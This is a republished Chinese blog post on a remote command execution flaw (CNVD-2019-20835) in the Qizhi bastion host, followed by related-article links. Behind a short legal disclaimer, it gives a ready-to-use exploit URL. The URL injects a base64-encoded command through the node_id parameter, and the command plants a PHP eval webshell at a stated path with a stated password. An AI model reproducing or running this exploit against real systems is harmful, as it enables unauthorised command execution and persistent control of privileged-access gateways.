齊治堡壘機遠程命令執行漏洞[CNVD-2019-20835] - 碼上快樂

相關內容簡體繁體

齊治堡壘機遠程命令執行漏洞[CNVD-2019-20835]

本文轉載自查看原文 2020-09-13 16:11 854 Web安全/ 技巧

請遵守網絡安全法！！！本文僅供學習交流使用！用於任何非授權滲透、非法目的攻擊、從事非法活動均與筆者無關！讀者自行承擔其惡果！

利用過程

訪問http://127.0.0.1/listener/cluster_manage.php 返回 "OK"

訪問如下鏈接即可getshell，執行成功后，生成PHP一句話馬
一句話馬路徑/var/www/shterm/resources/qrcode/lbj77.php  密碼10086

https://127.0.0.1/ha_request.php?action=install&ipaddr=127.0.0.1&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 齊治堡壘機前台遠程命令執行漏洞（CNVD-2019-20835）分析齊治堡壘機后台存在命令執行漏洞（CNVD-2019-17294）分析齊治堡壘機ShtermClient-2.1.1命令執行漏洞（CNVD-2019-09593）分析齊治堡壘機前台遠程命令執行漏洞 Weblogic反序列化遠程命令執行漏洞(CNVD-C-2019-48814)測試 WebLogic反序列化遠程命令執行（CNVD-C-2019-48814）漏洞預警泛微OA E-cology（CNVD-2019-32204）遠程命令執行漏洞復現分析 python之實現批量遠程執行命令（堡壘機） CVE-2019-0193 遠程命令執行-漏洞復現 Solr遠程命令執行漏洞（CVE-2019-17558）

粵ICP備18138465號 © 2018-2025 CODEPRJ.COM